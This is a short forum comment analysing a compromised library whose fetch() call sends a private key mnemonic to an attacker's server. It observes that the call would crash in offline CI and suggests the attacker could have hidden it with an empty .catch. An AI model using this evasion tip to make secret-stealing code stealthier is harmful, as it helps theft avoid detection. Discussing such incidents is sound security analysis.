|
|
|
|
|
|
by koolba
422 days ago
|
|
|
That fetch(…) is sending the mnemonic of the private key out to that remote server. Interestingly if this is happening in a long running process and that exploit server is offline, the promise for the fetch will reject. And the default behavior for unhandled promise rejections would be for the node process to crash. So if anybody tried testing this version of the library in a net gapped environment, it would crash and fail out in CI. The attacker should have silenced the error with a .catch(_ => {}). |
|
|